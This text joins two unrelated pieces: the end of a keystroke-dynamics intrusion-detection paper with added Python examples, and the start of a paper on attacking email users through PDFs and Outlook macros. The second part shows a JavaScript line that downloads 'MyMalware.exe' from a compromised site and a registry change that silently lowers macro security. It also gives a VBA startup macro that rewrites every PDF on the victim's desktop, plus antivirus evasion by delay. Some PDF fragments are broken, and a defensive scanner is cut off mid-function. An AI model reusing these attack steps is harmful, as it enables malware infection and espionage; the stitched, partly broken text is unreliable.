Our proposed scoring module derives from the idea that it is possible to benefit from the user's longest possible sample for comparison while keeping the system iterating with reasonably short samples, like the 1500-event samples on which the proposed algorithm is based. During the calculation of scores, the 1500-event attempt sample is compared against a unified user signature: a long sample with the merged information of every 1500-event sample stored by that user. With this, the maximum number of n-graphs is shared with the attempt, which consequently improves accuracy. Moreover, this merge is done at a very low processing cost.
Each sample n-graph carries its average, its standard deviation and its hit count (n). For a merged sample made of the combination (C) of two samples (sample 1 and sample 2), these values are obtained with the formulas shown in Figure 2; because each per-graph record keeps the count alongside the mean and the deviation, the merge does not need the original timings.
Figure 2: Obtaining average, standard deviation and hit count for a merged sample
With the merged sample and the attempt sample ready for comparison, the next step is to filter out all the graphs that are not shared between them; these samples come from unrestrained text input and are therefore unlikely to share every occurrence.
Our scoring algorithm is based on two measurements: absolute and relative comparisons. While absolute comparisons rely solely on timing values for identity evaluation, relative comparisons refer to the ordering of a user's typing, the underlying rationale being that if a legitimate user is known to type a certain n-graph faster than another (e.g. if he types the trigraph "for" faster than "spa"), he will consistently keep doing so, whatever the overall speed of his typing.
The global score of a sample is the average of the absolute and relative scores, as detailed below.
5.3.1 Absolute comparisons
For each shared graph, we compare the average timing of the attempt with the average timing of the profile sample (Table 3 expresses the comparison as the ratio of the larger average to the smaller one). If the result falls below a certain threshold, the graph comparison is labeled a success, and a failure otherwise. Setting the threshold is a key decision in this measurement.
A human user does not write every text segment with the same timing stability. In his typing dynamics, he becomes so used to performing certain finger movements that they become almost automatic (hence the resort to fixed and frequently typed samples in most keystroke dynamics solutions). This behavior can be exploited by reducing the acceptance threshold for the graphs the user is known to perform consistently (that is, those with the lowest standard deviation values). While the legitimate user will still easily qualify on his graphs, an attacker will most likely fail due to the reduced acceptance window. These graphs are called consistent graphs.
For each registered user, the database keeps and updates a record of their most consistent graphs (the 10% most consistent) on every subsample. This record is retrieved when the user profile is imported for comparison. When comparing a shared graph, the threshold to apply is determined by the graph's presence in that record. By default, we use 1.25 as the regular threshold value and 1.10 as the threshold for consistent graphs. These thresholds are then adjusted depending on each user's timing stability.
The absolute score of each subsample is the success ratio of the comparisons carried out. Finally, the final "absolute score" of a sample is the weighted sum of the subsample scores. The weight of each subsample (currently all equal) will be determined by a later impact analysis.
This process is illustrated in Table 3.
Table 3: Illustration of absolute score comparisons. Times are the profile and attempt averages for each trigraph; the ratio is the larger average over the smaller one; the regular threshold is 1.25 and the consistent-graph threshold 1.10.

Profile sample time   Graph     Attempt sample time   Ratio                   Result
38474                 A+P+P     21402                 38474/21402 = 1.798     Failure
30433                 L+E+S     37022                 37022/30433 = 1.217     Success
25514                 P+L+E*    29571                 29571/25514 = 1.159     Failure
23858                 P+P+L     33200                 33200/23858 = 1.392     Failure

* - marked as a consistent graph
We can see an example of a comparison that successfully made the regular threshold (
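As an added example (not the authors' code), the signature merge of section 5.3 and the absolute comparison of section 5.3.1 in Python, run on the Table 3 figures. The pooled-moment formulas stand in for Figure 2, which is not reproduced here, so treat them as an assumption; the standard deviations and hit counts of the profile, and the attempt's extra trigraph "X+Y+Z", are constructed values.

```python
"""Merge per-n-graph timing records into one signature and score an attempt
with the absolute comparison (added example; not the paper's implementation)."""
from math import sqrt

REGULAR_THRESHOLD = 1.25      # ratio of mean timings tolerated for ordinary n-graphs
CONSISTENT_THRESHOLD = 1.10   # tighter window for the user's most consistent n-graphs
CONSISTENT_FRACTION = 0.10    # the 10% of n-graphs with the lowest standard deviation

# Constructed profile: the means come from Table 3, the std/count fields are made up.
PROFILE_SIGNATURE = {
    "A+P+P": (38474.0, 900.0, 12),
    "L+E+S": (30433.0, 700.0, 9),
    "P+L+E": (25514.0, 150.0, 20),   # lowest deviation: becomes the consistent graph
    "P+P+L": (23858.0, 600.0, 15),
}
# Constructed attempt: Table 3 means plus one trigraph the profile has never seen.
ATTEMPT = {
    "A+P+P": (21402.0, 0.0, 3),
    "L+E+S": (37022.0, 0.0, 2),
    "P+L+E": (29571.0, 0.0, 4),
    "P+P+L": (33200.0, 0.0, 2),
    "X+Y+Z": (9999.0, 0.0, 1),       # not shared: filtered out before scoring
}


def merge_stats(a, b):
    """Combine two (mean, std, n) records of the same n-graph without the raw timings.
    Population moments (assumed): the pooled variance is the count-weighted mean of
    the variances plus the count-weighted squared distance of each mean to the new one."""
    m1, s1, n1 = a
    m2, s2, n2 = b
    n = n1 + n2
    m = (n1 * m1 + n2 * m2) / n
    var = (n1 * (s1 ** 2 + (m1 - m) ** 2) + n2 * (s2 ** 2 + (m2 - m) ** 2)) / n
    return (m, sqrt(var), n)


def unified_signature(samples):
    """Fold every stored sample {graph: (mean, std, n)} into one long profile."""
    sig = {}
    for sample in samples:
        for graph, stats in sample.items():
            sig[graph] = merge_stats(sig[graph], stats) if graph in sig else stats
    return sig


def consistent_graphs(signature, fraction=CONSISTENT_FRACTION):
    """The n-graphs with the lowest std (at least one): the near-automatic movements."""
    ranked = sorted(signature, key=lambda g: signature[g][1])
    return set(ranked[:max(1, int(len(ranked) * fraction))])


def absolute_score(signature, attempt, consistent):
    """Success ratio over the shared n-graphs; a graph succeeds when the ratio of the
    two means (larger over smaller, as in Table 3) stays below its threshold."""
    shared = set(signature) & set(attempt)
    if not shared:
        return None   # nothing to decide on; the caller must fall back (cf. 5.6.2)
    successes = 0
    for graph in shared:
        p, a = signature[graph][0], attempt[graph][0]
        limit = CONSISTENT_THRESHOLD if graph in consistent else REGULAR_THRESHOLD
        successes += max(p, a) / min(p, a) < limit
    return successes / len(shared)


def table3_ratios():
    """Reproduce the ratio column of Table 3 (rounded to three decimals)."""
    return {g: round(max(PROFILE_SIGNATURE[g][0], ATTEMPT[g][0])
                     / min(PROFILE_SIGNATURE[g][0], ATTEMPT[g][0]), 3)
            for g in PROFILE_SIGNATURE}


if __name__ == "__main__":
    strict = consistent_graphs(PROFILE_SIGNATURE)
    print("consistent:", strict)
    print("ratios:", table3_ratios())
    print("score with consistent graphs:", absolute_score(PROFILE_SIGNATURE, ATTEMPT, strict))
    print("score without them:", absolute_score(PROFILE_SIGNATURE, ATTEMPT, set()))
```

Scoring the Table 3 attempt gives 0.25 with P+L+E held to the 1.10 threshold and 0.5 without the consistent-graph rule, which is the whole point of the tighter window: the same timings that pass as "ordinary" fail as "consistent". Because the merge only needs (mean, std, n) per graph, the unified signature costs one pass over the stored records, which is the low processing cost the text refers to.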
5.5 Profile updating
This module is triggered when an attempt is successfully validated. The validated 1500-event sample is stored in the database alongside the rest of the user's samples, so that the user profile keeps up with changes in the user's typing dynamics over time. The number of 1500-event samples stored for each user is limited to 15, taking into consideration the computational weight of the scoring process. When the stored profile already consists of 15 samples, the oldest is erased to make room for the new one. Since every accepted attempt enters the profile, a false acceptance updates the profile as well; the FAR measured in Section 6 therefore also bounds how often the stored signature can drift towards an impostor.
5.6 Prevention and reporting
The Prevention and Reporting module is triggered when an attempt sample fails to validate, indicating the probable presence of an intruder.
5.6.1 Reporting measures
Intrusions are reported to a security log supervised by a security administrator. This solution uses the distance between the attempt sample's score and the user authentication threshold as the indicator of the Alarm Level of a detection: the rationale is that an attempt scoring far from the acceptance threshold is much more probably an intruder than one that fell below the acceptance threshold by a small margin. With intrusions logged at three alarm degrees (Yellow, Orange and Red, in ascending severity), the security administrator can prioritize his reaction to the intrusions detected, and the problem of excessive false alarms, endemic to all IDSs (Axelsson, 1999), can be alleviated through this mechanism.
5.6.2 Prevention measures
Current solutions, as well as this one, trigger an identity verification procedure each time a sample is logged, which we call synchronous verification. However, the larger number of n-graphs shared per sample (a result of this solution's merged imported user profile) allows a trustworthy identity verification even with shorter samples, as long as a certain number of shared n-graphs (to be determined through experimentation) is detected.
This creates an opportunity for prevention mechanisms that integrate with existing software applications in order to trigger asynchronous verifications. For example, with a package like Microsoft Office, whenever a user saves a document or sends an email, a verification can be triggered to ensure that the action is performed by the legitimate user. At that point the system is most likely still in the process of logging a 1500-event sample, but it may nevertheless be able to reach a valid decision. If too few shared n-graphs are detected during the asynchronous verification, the system falls back on the last synchronous decision, provided that the timestamp of the last sample shows it to be recent enough.
5.7 Security concerns
The fact that this biometric assessment relies on a keystroke monitoring agent is in itself a reason for user apprehension (particularly since malicious keystroke loggers became ubiquitous). This solution would pose a greater security risk than the original problem it tries to address if the text typed by every user could be reproduced. Therefore, making sure that none of the mentioned attacks are possible is critical to the relevance of the method and to the acceptability of the solution.
Keystrokes are stored as hash values (using SHA-256), and the original keystroke identifiers are masked before hashing; without the mask, the set of possible key identifiers is so small that an attacker could hash every one of them and invert the stored values by lookup (known-plaintext attacks would be trivial). Samples are sent to the server as whole processed chunks, holding per-n-graph statistics rather than an ordered event stream, so the typing sequence cannot be recovered from them. Since stored samples feature the hit count of each graph, attacks based on frequency analysis are a possibility. However, these depend strongly on language and are normally restricted to alphabetical keys and real text input, whereas our samples, being generated from unrestrained typing, set no language restrictions, refer not only to real text input but also to any other typing task (such as coding or gaming), and monitor non-alphabetical (and even non-alphanumerical) keys. Therefore, the chance of text reproduction using this technique is also significantly reduced. Without text reproduction, the samples disclose nothing about what was typed, even if stolen. Moreover, studies have demonstrated that even with full knowledge of a user's typing habits, learning and reproducing them is a very difficult task (Rundhaug, 2007).
Key masks and hash values are not reflected in the tables and figures of this article, in order to ease their comprehension.
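As an added example (not the authors' code), the difference between hashing a key identifier plainly and hashing it under a secret mask, in Python. The paper does not say how the mask is applied; HMAC-SHA256 with a per-installation secret is this example's choice, and the assumption that a keystroke identifier fits in one byte (256 possibilities) is what makes the unmasked dictionary attack so cheap.

```python
"""Plain versus masked SHA-256 of keystroke identifiers (added example)."""
import hashlib
import hmac
import secrets

KEY_SPACE = range(256)   # assumption: a keystroke identifier is a single byte


def plain_id(keycode):
    """Unkeyed SHA-256 of the key code: the variant the text warns against."""
    return hashlib.sha256(bytes([keycode])).hexdigest()


def masked_id(keycode, mask):
    """Keyed SHA-256 (HMAC) of the key code. Still deterministic for a given mask,
    so the same n-graph hashes identically across samples and can be matched,
    but the digest tells an attacker nothing without the mask."""
    return hmac.new(mask, bytes([keycode]), hashlib.sha256).hexdigest()


def hash_ngraph(keycodes, mask=None):
    """Hash every key of an n-graph, with or without the mask."""
    return tuple(masked_id(k, mask) if mask else plain_id(k) for k in keycodes)


def dictionary_attack(hashed_graph, mask_guess=None):
    """The attacker's move: hash all 256 candidates once and look the stored digests
    up. With no mask (or the right one) this recovers the typed keys; with the
    wrong mask every lookup misses and yields None."""
    table = {(masked_id(k, mask_guess) if mask_guess else plain_id(k)): k
             for k in KEY_SPACE}
    return tuple(table.get(h) for h in hashed_graph)


def demo():
    """Run the attack against both encodings of the paper's trigraph 'for'."""
    trigraph = tuple(b"for")                    # key codes of the example trigraph
    mask = secrets.token_bytes(32)              # per-installation secret, never stored with samples
    leaked_plain = hash_ngraph(trigraph)
    leaked_masked = hash_ngraph(trigraph, mask)
    return {
        "unmasked_recovered": bytes(dictionary_attack(leaked_plain)).decode(),
        "masked_recovered": dictionary_attack(leaked_masked),
        "masked_deterministic": hash_ngraph(trigraph, mask) == leaked_masked,
    }


if __name__ == "__main__":
    print(demo())
```

The masked form is pseudonymisation, not encryption: whoever holds the mask can rebuild the 256-entry table and undo it, so the mask has to be kept off the sample store, and the per-graph hit counts still allow the frequency analysis the text discusses.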
6. Experimental environment
For validation purposes, a prototype of the proposed solution featuring just the Event Logging and Sample Processing functionalities (aimed at capturing samples) was installed on several computers in a real organization. The application is executed automatically when the user logs in to the system and is completely transparent: it runs in the background without ever giving signs of its presence. The captured samples will serve as input to the Scores Calculation module (a centralized unit during this experimental phase).
Samples are being captured during the users' sessions with absolutely no restrictions on text input: users produce samples while writing emails, posting in forums, coding, writing in Portuguese (their native language) or in English, and so on. Each sample has a fixed length of 1500 events (around 750 characters). Each user logs up to 15 samples. The program is currently installed on a user base of around 200 participants, resulting in 15 legitimate attempts and around 2985 (199 intruders, each registering 15 samples) intrusion attempts for each user.
A thorough analysis of the results from this experiment will be published in a subsequent report. This will be an important step to obtain statistically relevant metrics in order to optimize the model design and the algorithm's performance. The most relevant, as with any IDS, will be the False Acceptance and False Rejection Rates (FAR/FRR), both global and for each subsample.
7. Conclusion and future work
In this paper we have proposed a solution to perform anomaly-based intrusion detection through the use of keystroke dynamics biometrics. Some approaches from the published literature were introduced. The proposed solution includes several improvements, namely in the filtering of unrestrained text input, sample organization, scores calculation, the decision process and the ability to evaluate profiles asynchronously. The experimentation period will allow refinements of what we believe is already an interesting new step in the area. Studying the benefits of adding pointer dynamics measurements, a popular complement to keystroke dynamics, is also an objective for the future.
In recent years, the way a human user interacts with computers has been progressively shifting to touch interfaces. Given current trends, we can no longer be sure of the presence of physical keyboards in every computer over the next five or ten years. However, virtual keyboards also provide the timing measures used to build current keystroke dynamics solutions. Successfully porting this solution to virtual interfaces is a challenging possibility worth exploring in future work.
References
Ahmed, A.A.E. and Traore, I. (2005) 'Anomaly Intrusion Detection Based on Biometrics', Proceedings of the Sixth Annual IEEE SMC Information Assurance Workshop, West Point, pp. 452-453.
Axelsson, S. (1999) 'The base-rate fallacy and its implications for the difficulty of intrusion detection', Proceedings of the 6th ACM Conference on Computer and Communications Security, New York, pp. 1-7.
Bergadano, F., Gunetti, D. and Picardi, C. (2002) 'User authentication through keystroke dynamics', ACM Transactions on Information and System Security, vol. 5, no. 4, November, pp. 367-397.
Chinchani, R., Iyer, A., Ngo, H.Q. and Upadhyaya, S. (2005) 'Towards a Theory of Insider Threat Assessment', 2005 International Conference on Dependable Systems and Networks (DSN'05), pp. 108-117.
Dowland, P.S. and Furnell, S.M. (2004) 'A Long-Term Trial of Keystroke Profiling Using Digraph, Trigraph and Keyword Latencies', Security and Protection in Information Processing Systems, vol. 147, pp. 275-289.
Gunetti, D. and Picardi, C. (2005) 'Keystroke Analysis of Free Text', ACM Transactions on Information and System Security, vol. 8, no. 3, August, pp. 312-347.
Hempstalk, K. (2009) Continuous Typist Verification using Machine Learning.
Iwasaki, K., Miyaki, T. and Rekimoto, J. (2009) 'Expressive typing: a new way to sense typing pressure and its applications', Proceedings of the 27th International Conference Extended Abstracts on Human Factors in Computing Systems, Boston, pp. 4369-4374.
Jiang, C.-H., Shieh, S. and Liu, J.-C. (2007) 'Keystroke statistical learning model for web authentication', Proceedings of the 2nd ACM Symposium on Information, Computer and Communications Security, New York, pp. 359-361.
Liu, S. and Silverman, M. (2001) 'A Practical Guide to Biometric Security Technology', IT Professional, vol. 3, no. 1, pp. 27-32.
Lopatka, M. and Peetz, M.-H. (2009) 'Vibration Sensitive Keystroke Analysis', Proceedings of the 18th Annual Belgian-Dutch Conference on Machine Learning, Tilburg, pp. 75-80.
Lynch, D.M. (2006) 'Securing Against Insider Attacks', Information Security Journal: A Global Perspective, vol. 15, no. 5, November, pp. 39-47.
Magalhães, P.S. (2005) Estudo dos Padrões de Digitação e Sua Aplicação na Autenticação Biométrica [Study of Typing Patterns and their Application to Biometric Authentication].
Marsters, J.-D. (2009) Keystroke Dynamics as a Biometric. Available at: http://eprints.soton.ac.uk/66795/.
Monrose, F. and Rubin, A.D. (2000) 'Keystroke dynamics as a biometric for authentication', Future Generation Computer Systems, Special issue on security on the Web, vol. 16, no. 4, February, pp. 351-359.
Robinson, J.A., Liang, V.W., Chambers, J.A.M. and MacKenzie, C.L. (1998) 'Computer user verification using login string keystroke dynamics', IEEE Transactions on Systems, Man, and Cybernetics, Part A: Systems and Humans, vol. 28, no. 2, March, pp. 236-241.
Rundhaug, F.E.N. (2007) Keystroke Dynamics: Can Attackers Learn Someone's Typing Characteristics.
Schneier, B. (2009) 'Thwarting an Internal Hacker', The Wall Street Journal, 16 February.
Schultz, E.E. (2002) 'A Framework for Understanding and Predicting Insider Attacks', Computers & Security, vol. 21, no. 6, October, pp. 526-531.
Perverting eMails: A new Dimension in Internet (in) Security
Eric Filiol, Jonathan Dechaux and Jean-Paul Fizaine
ESIEA - Operational virology and cryptology laboratory, France
filiol@esiea.fr
https://sites.google.com/site/ericfiliol/
Abstract: Electronic mail (or email) has not just changed the way we communicate in our daily life; it has transformed the way we do business today. Considered a convenient, powerful and low-cost tool, it is widely used to convey all kinds of information, including, unfortunately, sensitive or confidential information such as passwords, personal data and private information. In recent times, two emerging technologies, cloud computing and browser-based email, have gained popularity among users and, along the way, have also added a significant new layer of risk: it is now common practice for users to store their passwords in email folders and, even worse, most browsers store and remember the password that opens the email account automatically. Let us imagine the consequences of an attack launched by cybercriminals and designed to divert the original functionality and features of the browser to any malicious purpose, or worse, to terrorist ends. Take for example a US military officer operating in a country at war such as Afghanistan who simply sends emails to his family to keep in touch with them. Whenever he sends an email, thousands of emails containing racial slurs against Muslim people are automatically sent to Afghan troops from his web account without his knowledge. The consequences of such an action would be unquestionably devastating. This example, though fictitious, illustrates how effective this kind of email could be for both war propaganda and deception operations against US troops. Now imagine a company's decision maker who daily exchanges large amounts of email containing sensitive or confidential information within and outside his company, ranging from trade secrets, contract details, customer lists, research reports and financial information to staff's personal details. Modifying the browser-based email technology could enable any ill-intentioned person to wiretap and eavesdrop on any email directly at the browser level, recording any sent data and exfiltrating it from the computer towards unscrupulous people. The collection of the daily flow of emails, both internal and external, definitely provides a snapshot of a company's overall culture and is proving to be a powerful and efficient tool for both industrial and economic espionage. As a last example, these technologies, once modified, could be used to set up thousands of zombies in mail clients. For that purpose, a large number of email clients would simultaneously send thousands of mails to a single target, e.g. an email server, to deny mail service for a limited period of time. We can easily imagine that this kind of attack launched on any stock exchange computer system would entail damaging economic repercussions for the affected country and would probably plunge it into chaos for some time. In this paper, we will explain and show that email can be used as an ideal weapon for terrorism, cyber warfare, espionage and denial of service, and can cripple all sectors of the economy and nation states. We will address these issues at both the technical and the operational level. In every case, we have considered systems with the most restricted user privileges, which nonetheless leave those attacks easy and powerful.
Keywords: eMail, terrorism, cyber-attack, espionage, email client, browsers, cyber warfare
1. Introduction
In recent years, companies, governments and institutions have been facing new threats, especially due to the ever-growing menace of cyber-terrorism, which takes place in a new space. This ongoing threat has plunged the world into a permanent state of cyber warfare, with the power to keep the victims at war for the indefinite future.
The most common and typical threats today are industrial, government or military espionage and the disruption of institutions using denial of service attacks. However, other risks are emerging, and the new cyber-criminals' playground is information manipulation, ranging from propaganda war to disinformation or information overload. In this field, the targets are manifold, and the cyber-criminals behind the operations may belong to government institutions or to small groups. Recent attacks on governmental communication networks showed that one of the main entry points used is an office suite. The latest attacks on the German chancellery or on the European financial system have unfortunately been successful. Investigations showed that both attacks were based on diverting macro-enabled documents from their original use.
91
Eric Filiol et al.
Other office applications can be used as well, such as email management software. Our focus here is to show how Outlook, which relies on macros to operate, turns out to be an excellent tool with which to launch a massive attack, mainly because it is one of the most commonly used products on the market. Our purpose is to demonstrate, through three proofs of concept, how cyber-criminals can misuse email software to perform malicious acts related to cyber terrorism or cyber warfare. These attacks only require office documents (in PDF format exclusively) as attack vectors. Other proofs of concept based on PDF files exist as well and have been studied by (Blonce et al. 2008) and in (Stevens 2010). Other attacks based on the use of malicious macros have also been introduced in (Dechaux et al. 2010a; 2010b).
As a first step, we will study the structure of a PDF file and then show how it can be misused to weaken the victim. As a second step, we will review the main features of Outlook and then highlight the configuration weaknesses that enable a macro to be executed transparently. Given the perennial nature of the attack (the purpose here is not to exploit any software vulnerability), we will describe the infection mechanism inherent to the PDF language. The infection is actually based on various strategies, and our goal is to demonstrate how the PDF language can be used in an attack situation. The next step is to show that once the victim is weakened, the macro can be executed in a transparent way.
Finally, we will consider how cyber-criminals can operate mail server attacks, perform espionage activities or launch propaganda wars through a misuse of email software.
This paper is organized as follows. Section 2 presents the basics of office documents and a few technical aspects of the PDF format, JavaScript, Microsoft Office and OpenOffice macros, and the security of those macros. Section 3 exposes how our attack is prepared and which kind of infection vector is used; we also present our attack strategy. Section 4 presents three operational attack scenarios: email server DoS, email eavesdropping (espionage) and propaganda (information operations). Of course, many more scenarios are possible.
Due to lack of space, only the critical pieces of proof-of-concept code are given in this paper. The complete source code can be obtained by contacting the first author.
2. Fundamental and technical concepts
In order to follow our attacks, the reader must be familiar with a few concepts related to office documents: PDF documents, documents with macros (Microsoft Office or OpenOffice) and the way the related security settings are organized, both at the application and at the operating system level.
2.1 PDF structure and JavaScript
Our attacks exploit the possibility for a PDF document (actually a script file written in the PDF language) to embed JavaScript primitives and code. In order to manage JavaScript primitives (adding, editing, embedding) at the code level in the PDF code itself, it is necessary to use an application such as Acrobat (or equivalent applications such as Scribus). Alternatively, though trickier, one can work directly at the code level with a simple text editor.
The full specification of the PDF format is available in the Adobe reference documents (Adobe, 2007 & 2008). We recall in this section only the important elements of a PDF. A PDF file is organized in four different parts.
The Header: the file begins with a magic number, which specifies that it is a PDF document while indicating its version (at the time of writing, the PDF format is at version 1.7).
The Body: the content itself of the PDF file, represented by objects organized in lists or in trees. Its root is the Document Catalog object, whose presence is mandatory (the trailer's /Root entry points to it); the catalog is a dictionary that references the document's content objects.
The Cross-reference table: this is the most critical part of any PDF file. The table contains references to all the objects composing the PDF file. It is in fact a simple table of pointers (byte offsets from the beginning of the file). Any object can therefore be accessed directly and at random, which optimizes PDF file management and display. The table begins with the keyword xref.
The Trailer: it is made of a dictionary whose entries reference special objects (the catalog among them) and of a pointer (the startxref offset) to the cross-reference table.
The data displayed by PDF files is built from eight basic kinds of objects (booleans, numbers, strings, names, arrays, dictionaries, streams and the null object), which are themselves organized in trees and/or lists. The following fragment illustrates the structure of a simple PDF file containing a piece of JavaScript code that is executed whenever the PDF file is opened.
27 0 obj
>>
stream
function hello()
{
var myData = "Hello World";
app.alert({ cMsg: myData, cTitle: "Acme Testing Service" });
}
endstream
endobj
28 0 obj
>>
endobj
29 0 obj
>>
endobj
7 0 obj
>>
endobj
To execute the JavaScript part, we need to insert an additional entry in the document catalog.
/OpenAction >>
The /OpenAction key specifies that an action must be executed when the document is opened. Its value is either an array (a destination) or a dictionary (an action). For JavaScript execution, an action dictionary is used and the keys /S and /JS must both be present. The first declares the type of action: when it is followed by the name /JavaScript, it defines the language of the script. The second, /JS, carries the script itself, either as a string or as a reference to a stream object such as object 27 above.
More generally, a PDF is able to react to certain events (the format is hence event-oriented). It is then possible to associate an action with an operation. All the possibilities are listed in the Adobe reference documents (Adobe, 2008).
2.2 Document macros and security configuration related to macros
Any Microsoft Office/OpenOffice document can contain macros whose purpose is to automate a number of actions or perform different kinds of internal/external actions. The main intent is to provide ergonomics and ease of use to users. Without loss of generality we will consider the case of Microsoft Office only, on Windows systems.
The macro security level is mostly defined and enforced at the operating system level (Dechaux et al., 2010a & 2010b), in the Windows registry (user-specific section "HKEY_CURRENT_USER"). We find the level of security in the key "Security", under the value name "Level".
For Outlook 2007, the path for the key "Security" is
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Outlook
while for Outlook 2010, the path for the key "Security" is
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook
The security level is a "REG_DWORD" and it ranges from 1 to 4, corresponding to the four possible security levels in Outlook (and for any other application: Word, Excel, PowerPoint...). Contrary to Microsoft Word or Excel, the values in the registry are the same as the corresponding level of security:
Level 4: no warnings and all macros disabled (registry value 0x00000004).
Level 3: warnings for signed macros only. All unsigned macros are disabled (registry value 0x00000003).
Level 2: warnings for all macros (registry value 0x00000002).
Level 1: no security check for macros (not recommended) (registry value 0x00000001).
To achieve our attacks, it will be necessary to change the value of this "REG_DWORD" to the lowest possible value, i.e. "Level 1: 0x00000001" (of course without triggering any alert/warning [Dechaux et al., 2010a & 2010b], neither from the operating system nor from any antivirus software in place).
2.3 Outlook macros
Let us now explain where Outlook macros are stored. They are located in a special file, whose extension is "OTM". This OTM file is user-specific, as the registry values are. This file is named "VbaProject.OTM" and its path is given by:
C:\Users\\AppData\Roaming\Microsoft\Outlook
It is not possible to edit this file directly and access the information in it. Indeed it is compiled by the Microsoft Office suite whenever it is opened. However, since it is a user-specific file, we can replace it by a malicious version of it (e.g. containing our malicious macros).
All Outlook macros are written in Visual Basic. Any macro can call external functions from the Windows API. Regarding the execution of macros in Outlook, we are going to use three different macro execution modes, triggered whenever Outlook is opened or an email is sent or received.
Private Sub Application_ItemSend(ByVal Item As Object, Cancel As Boolean)
End Sub
Private Sub Application_NewMail( )
End Sub
Private Sub Application_Startup( )
End Sub
According to the type of attack we are going to perform, we will use one to three modes. For some reason (mainly to bypass antiviral detection mechanisms), we have to use delays in attacks. For that purpose, it is also necessary to define a sleep function, which is not a Visual Basic primitive but a Windows API function.
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
3. PDF files as infection vectors
Contrary to (malicious) Word or Excel documents, there are no Outlook documents. So we must imagine a different kind of infection vector to install malicious macros. We are going to use PDF files.
3.1 Attack strategy
Microsoft macros are not executed by default. We know that the configuration of Outlook allows or forbids the execution of macros and that this configuration is stored in the registry. It is then necessary to change this setting one way or another: either through a user's direct action or through an innocent-looking external program. But a suspicious user is not likely to run executables, whereas any user generally accepts to open PDF files. Consequently we are going to use this powerful infection vector.
Our attack is based on k-ary malware (Filiol, 2007). The general principle consists in using k different, innocent-looking files, whose actions are combined to perform a viral attack. The malware code is split into k different parts which can be independent one from the other, or not. Each part is responsible for a specific action which has been assigned to it.
For our attack we used k = 3 as follows:
The first part (the infectious agent) is devoted to the initial infection (primo infection or infection setup).
The second part (which is installed by the first one) modifies the target system to lower its security: the macro security level is set to level 1 and the malicious macro is installed.
The third part (contained in the malicious macro) is dedicated to the payload (the offensive action), which is triggered whenever an email is sent by the user.
Our infection strategy (see Figure 1) is based on a malicious PDF file.
Figure 1: PDF file-based infection strategy.
3.2 Introduction of the infectious agent
We chose a very simple yet powerful technique. The agent is downloaded from the PDF file which has been sent to the user. However it will not download the executable directly; instead it contains a JavaScript which calls the default browser. The latter itself performs the download.
this.launchURL("http://www.compromisedSite/MyMalware.exe");
The implementation consists in a simple line of code. It calls the document through the object "this" and then calls the launchURL method with, as an argument, the address from which the download shall be performed. Upon execution this simple line of code downloads the file "MyMalware.exe" immediately. The weakness on which our attack relies lies in the browsers' inability to manage security efficiently. In order to have a universal and portable infection step, we can alternatively embed the executable in the PDF file, which then has to extract it.
Among many methods to perform this, we used the "ExportDataObject" and "saveAs" methods. The most interesting approach is the use of the first one because it allows the execution of the executable, contrary to the method "saveAs" which does not allow it. It is necessary to use the possibilities of the PDF format by using launch primitives (Filiol 2008). However we have to synchronize the download and execution actions to make sure that the infectious agent itself is executed safely (without triggering an antivirus alert).
3.3 PDF infection mechanism
Figure 2: Infection mechanism
To go on with the infection and operate on a larger scale, we chose to infect all PDFs on the desktop of the victim. We are going to list all the documents which have a PDF extension and infect them. To do this, we wrote a macro that will be executed whenever Outlook is opened, by using the "Application_StartUp( )" mode. Hence we modify the PDF code by inserting our malicious executable (ME) in the PDF file and adding the JavaScript primitive to execute ME.
Here follows the code that performs this infection. It is divided into two parts (see Figure 2):
The definition of the variables and objects required, along with the recovery of the user's name.
The infection of the PDF files which are on the desktop.
The macro has to insert the JavaScript code, /JS, in the Catalog object of the document so that the JavaScript is executed. If that object is present then it is enough to add an additional entry. If the object does not exist, it will be necessary to create it.
Private Sub Application_Startup()
    ' Error management
    On Error Resume Next
    ' Variable definition
    Dim objFSO, objDossier, objFichier
    Dim Repertoire, UserName
    ' Get the session username
    UserName = Environ("username")
    Repertoire = "C:\Users\" & UserName & "\Desktop"
    ' Object definition
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objDossier = objFSO.GetFolder(Repertoire)
    ' For each pdf file on the desktop
    If (objDossier.Files.Count > 0) Then
        For Each objFichier In objDossier.Files
            If (InStr(1, objFichier.Name, ".pdf", 1) > 0) Then
                ' Pdf path creation
                path = Repertoire & "\" & objFichier.Name
                ' Open the file in reading
                Open path For Input As #1
                While Not Eof(1)
                    Line Input #1, buff
                    table = table + buff + Chr(13)
                Wend
                Close #1
                ' Research
                ' Modification
                ' Open the file in writing
                Open path For Output As #1
                Print #1, table
                Close #1
            End If
        Next
    End If
    ' Variable release
    objResultat.Close
    Set objDossier = Nothing
    Set objFSO = Nothing
End Sub
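The structural facts given in sections 2.1, 3.2 and 3.3 (an /OpenAction entry in the Catalog that points at an /S /JavaScript action, /Launch primitives, an embedded executable) are exactly what a defender should look for before a PDF is opened, and what an incident responder should check on the files of a desktop after an infection of the kind described above. The Python scanner below is an added example written for this page; it is not the authors' code and not pdfid, although it follows the same keyword-counting idea as Stevens (2010). The three PDF samples are constructed here for the demonstration, and the function names are ours.

```python
import re
import sys
from typing import Dict, List

# Keywords worth counting before opening a PDF, in the spirit of pdfid (Stevens, 2010).
KEYWORDS = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch",
            b"/EmbeddedFile", b"/URI", b"/ObjStm", b"/FlateDecode"]

# "N G obj ... endobj": one uncompressed indirect object (number, generation, body).
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)


def normalize_names(data: bytes) -> bytes:
    """Undo #xx hex escapes in PDF names (/J#61vaScript -> /JavaScript) so that
    keyword matching cannot be dodged by trivial name obfuscation."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def count_keywords(data: bytes) -> Dict[str, int]:
    """Occurrences of each keyword as a whole name (so /JS does not match /JSfoo)."""
    data = normalize_names(data)
    return {k.decode(): len(re.findall(re.escape(k) + rb"(?![A-Za-z0-9])", data))
            for k in KEYWORDS}


def load_objects(data: bytes) -> Dict[int, bytes]:
    """Map object number -> raw body for every uncompressed object in the file."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(data)}


def open_action_runs_javascript(data: bytes) -> bool:
    """True when the catalog's /OpenAction is, or points to, an /S /JavaScript action."""
    data = normalize_names(data)
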